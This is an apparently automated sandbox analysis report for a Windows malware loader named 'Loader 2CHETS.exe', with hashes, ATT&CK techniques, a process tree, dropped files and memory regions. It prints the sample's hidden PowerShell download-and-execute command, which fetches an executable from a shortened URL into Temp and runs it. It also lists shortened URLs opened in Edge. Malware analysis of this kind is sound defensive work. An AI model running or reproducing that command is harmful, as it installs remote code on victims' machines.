6dc4a97d43627b62cb3d7cebb0f484cd7a44662f8552151e6ab4be2cb7af434e

Analysis

max time kernel
149s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
17-05-2024 15:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader 2CHETS/Loader 2CHETS.exe
Size

742KB
MD5

27444b817650f6870eac33f757a23c8e
SHA1

7f6dc32a6334a12255f71aa2bcef9952a369c705
SHA256

c1070ea8eedb617d154ac558141d58a7b18577fc7b2af12cdcc958e3e5fa1af9
SHA512

20291b56c78dad90692e971fb2a9e02308f6725ff2adc87235ea60a7e01076b089caa274188f08a45974de9005dd4f11a917a6a279b8dd6ec80bd0ffe1704431
SSDEEP

12288:34nZVJNVNQjSYxuw7jM9HSGZprjKhBvYpriE2ApW8k9uR53q:IZV9NQRxuw7g9BuhWprZ48k9uR0

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://goo.gl/RQ1BY2

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
23	3240	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3240	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	Loader 2CHETS.exe

Executes dropped EXE 1 IoCs

pid	Process
372	Loader CrossFire.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3240	powershell.exe
3240	powershell.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
4548	msedge.exe
4548	msedge.exe
1540	msedge.exe
1540	msedge.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
3992	msedge.exe
3992	msedge.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe
372	Loader CrossFire.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3240	powershell.exe
Token: SeDebugPrivilege	372	Loader CrossFire.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe
3992	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4980 wrote to memory of 372	4980	Loader 2CHETS.exe	82
PID 4980 wrote to memory of 372	4980	Loader 2CHETS.exe	82
PID 4980 wrote to memory of 372	4980	Loader 2CHETS.exe	82
PID 4980 wrote to memory of 3240	4980	Loader 2CHETS.exe	84
PID 4980 wrote to memory of 3240	4980	Loader 2CHETS.exe	84
PID 4980 wrote to memory of 3240	4980	Loader 2CHETS.exe	84
PID 372 wrote to memory of 3992	372	Loader CrossFire.exe	86
PID 372 wrote to memory of 3992	372	Loader CrossFire.exe	86
PID 372 wrote to memory of 4392	372	Loader CrossFire.exe	88
PID 372 wrote to memory of 4392	372	Loader CrossFire.exe	88
PID 3992 wrote to memory of 3472	3992	msedge.exe	87
PID 3992 wrote to memory of 3472	3992	msedge.exe	87
PID 4392 wrote to memory of 1116	4392	msedge.exe	89
PID 4392 wrote to memory of 1116	4392	msedge.exe	89
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 2724	4392	msedge.exe	90
PID 4392 wrote to memory of 4548	4392	msedge.exe	91
PID 4392 wrote to memory of 4548	4392	msedge.exe	91
PID 3992 wrote to memory of 564	3992	msedge.exe	92
PID 3992 wrote to memory of 564	3992	msedge.exe	92
PID 3992 wrote to memory of 564	3992	msedge.exe	92
PID 3992 wrote to memory of 564	3992	msedge.exe	92
PID 3992 wrote to memory of 564	3992	msedge.exe	92
PID 3992 wrote to memory of 564	3992	msedge.exe	92
PID 3992 wrote to memory of 564	3992	msedge.exe	92
PID 3992 wrote to memory of 564	3992	msedge.exe	92

C:\Users\Admin\AppData\Local\Temp\Loader 2CHETS\Loader 2CHETS.exe
"C:\Users\Admin\AppData\Local\Temp\Loader 2CHETS\Loader 2CHETS.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4980
- C:\Users\Admin\AppData\Local\Temp\Loader CrossFire.exe
  "C:\Users\Admin\AppData\Local\Temp\Loader CrossFire.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:372
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://bit.ly/2ppsp50
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3992
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe582946f8,0x7ffe58294708,0x7ffe58294718
      4⤵
      PID:3472
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,4114218206072137985,9287659853580458254,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
      4⤵
      PID:564
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,4114218206072137985,9287659853580458254,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1540
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,4114218206072137985,9287659853580458254,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
      4⤵
      PID:4540
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,4114218206072137985,9287659853580458254,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
      4⤵
      PID:556
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,4114218206072137985,9287659853580458254,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
      4⤵
      PID:3272
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,4114218206072137985,9287659853580458254,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1
      4⤵
      PID:2740
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,4114218206072137985,9287659853580458254,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5468 /prefetch:8
      4⤵
      PID:1364
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,4114218206072137985,9287659853580458254,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5468 /prefetch:8
      4⤵
      PID:940
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,4114218206072137985,9287659853580458254,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:1
      4⤵
      PID:2516
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,4114218206072137985,9287659853580458254,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
      4⤵
      PID:4460
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,4114218206072137985,9287659853580458254,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
      4⤵
      PID:5332
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,4114218206072137985,9287659853580458254,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
      4⤵
      PID:5340
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,4114218206072137985,9287659853580458254,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3076 /prefetch:2
      4⤵
      PID:2880
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://bit.ly/2oERYld
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4392
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffe582946f8,0x7ffe58294708,0x7ffe58294718
      4⤵
      PID:1116
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,2930024886117008104,9100092232545280119,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
      4⤵
      PID:2724
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,2930024886117008104,9100092232545280119,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4548
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://goo.gl/RQ1BY2','C:\Users\Admin\AppData\Local\Temp\Test.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\Test.exe'
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3240

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4528

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4980

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4158365912175436289496136e7912c2

SHA1
813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59

SHA256
354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1

SHA512
74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ce4c898f8fc7601e2fbc252fdadb5115

SHA1
01bf06badc5da353e539c7c07527d30dccc55a91

SHA256
bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa

SHA512
80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
197B

MD5
99a5f77b8f893ee1aacd29e3777e69c2

SHA1
a07e09880322c4ad678f3cb73c1817de4ac23a53

SHA256
174fba2104a61dfb183b38521f9217813ce69501e74565397062b15500495f00

SHA512
d8567a684176467ba005399423ebfbe77880d88652e0c62877b8dcdf9dd30c7ff11725098878e7fa08d1c8e92a9c4ff88f896bc266fdbd8993ed7ae235671651

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
e0b84890d84a99814fbb7613ac874d13

SHA1
771597a524eabf557e2d0e98cb98547bc29d88df

SHA256
420afef08345ac4d3c6506ae5f75101f6280e793221f7f9ff3f548a6b4eafa03

SHA512
c91bdd86d88bdb7bcc3462295627aa2ecc198d91747288ff51d8d1a203ddd159f2426c4de4b459bdaf8aedf8a4367c61e42f603d4318f0a1e1d35b44e619eb6c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
00c5a453ef469240a8d315de0b2a4561

SHA1
21dc131171d1f73507de29c1c3b1009966ddc9a3

SHA256
7b6fe8c67361efffa51d9ec3e3e5a16840e1faf6c97925ab4230969830f6acda

SHA512
ad3b431496ea0ea556adce87b63060a8eb2ad247271266f70afb0940afe69c29871e7776fecb8a03820baf302bbedad30a38e637589cae1c07896d4297fefd66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
6d016249bfa93c4b298bd7e08ac70d91

SHA1
d4f71ba535491f643d131daad345b5d173265287

SHA256
c4b4972dabbefa8a67872258890813bb1e7ba4c58f879310586abe0525ed3f72

SHA512
04eff9bb76616e2dcb7a4c706a084f08af6c4b8a11972704b319e2f417262d1a738be3bc416aa4aefd95721554f62f7a3e0f5b940ddf6c42d1b87342dad0f939

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\d9af15df-a9a8-4b88-9406-9c128cee9d00.tmp

Filesize
8KB

MD5
382b5c871d8257daa052288a9529eb2c

SHA1
fd849248f14ed44d2e69d1fd0745c611f6d69426

SHA256
938e5fdaf2db57f623eb17fb0079557592e1caedeb07783dd20b226900f1ac99

SHA512
ce58f9d3cbe72ff0d27a5054178dac6df550b874b458ee14dac1a7134994cb558e658d1c34c534c40d95d5c581f280e2e40aae7563d7004a37891a6c5058d5e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Loader CrossFire.exe

Filesize
1.9MB

MD5
6d87dd41eba03ff1b2b0657ca61b2d83

SHA1
91370c530aa5c1eed47ed50c462232941ea302d9

SHA256
368420f2900be2d8900a57069dd2842fbf24b4dd28f6c2892209ad0ea2ac3891

SHA512
9b9126a6418f5424fd25f9c99190d270e511494b872f81eb9097d7a3a0af93b9b44037e115af30c469b8f3c8ee7da091291e072ab2b4397982a82b5b05bdcefc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n1uqpz4b.y2x.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\logs.lnk

Filesize
1KB

MD5
3c320772a3ed387eebf9236ad44ad7eb

SHA1
ca5676694e79ae5dc844e532df42ef7b60ac2908

SHA256
72f903e2b937c9d3cf0f99e46896755623506754182e1dc10cd3959e780be48b

SHA512
1b180b92b094aeea2c8a58a1fa4a6a4cb69d976a9d3b3596869952f82890466e681f42d3becdf09697b3de23635b3b1748cd989933ad6456b033807ae7c57288

Download Submit
memory/372-27-0x0000000004F90000-0x0000000004FE6000-memory.dmp

Filesize
344KB

Download
memory/372-22-0x0000000073100000-0x00000000738B0000-memory.dmp

Filesize
7.7MB

Download
memory/372-15-0x000000007310E000-0x000000007310F000-memory.dmp

Filesize
4KB

Download
memory/372-26-0x0000000004D10000-0x0000000004D1A000-memory.dmp

Filesize
40KB

Download
memory/372-17-0x00000000000B0000-0x00000000002A6000-memory.dmp

Filesize
2.0MB

Download
memory/372-18-0x0000000004C60000-0x0000000004CFC000-memory.dmp

Filesize
624KB

Download
memory/372-138-0x0000000073100000-0x00000000738B0000-memory.dmp

Filesize
7.7MB

Download
memory/372-19-0x0000000005310000-0x00000000058B4000-memory.dmp

Filesize
5.6MB

Download
memory/372-21-0x0000000004E00000-0x0000000004E92000-memory.dmp

Filesize
584KB

Download
memory/3240-28-0x0000000073100000-0x00000000738B0000-memory.dmp

Filesize
7.7MB

Download
memory/3240-45-0x0000000005BC0000-0x0000000005BDE000-memory.dmp

Filesize
120KB

Download
memory/3240-61-0x00000000060A0000-0x00000000060BA000-memory.dmp

Filesize
104KB

Download
memory/3240-60-0x0000000007400000-0x0000000007A7A000-memory.dmp

Filesize
6.5MB

Download
memory/3240-30-0x0000000073100000-0x00000000738B0000-memory.dmp

Filesize
7.7MB

Download
memory/3240-25-0x0000000004700000-0x0000000004736000-memory.dmp

Filesize
216KB

Download
memory/3240-46-0x0000000005C60000-0x0000000005CAC000-memory.dmp

Filesize
304KB

Download
memory/3240-29-0x0000000004DA0000-0x00000000053C8000-memory.dmp

Filesize
6.2MB

Download
memory/3240-106-0x0000000007020000-0x0000000007042000-memory.dmp

Filesize
136KB

Download
memory/3240-105-0x0000000007080000-0x0000000007116000-memory.dmp

Filesize
600KB

Download
memory/3240-111-0x0000000073100000-0x00000000738B0000-memory.dmp

Filesize
7.7MB

Download
memory/3240-31-0x0000000004D10000-0x0000000004D32000-memory.dmp

Filesize
136KB

Download
memory/3240-32-0x0000000005540000-0x00000000055A6000-memory.dmp

Filesize
408KB

Download
memory/3240-34-0x0000000073100000-0x00000000738B0000-memory.dmp

Filesize
7.7MB

Download
memory/3240-40-0x0000000005620000-0x0000000005974000-memory.dmp

Filesize
3.3MB

Download
memory/3240-33-0x00000000055B0000-0x0000000005616000-memory.dmp

Filesize
408KB

Download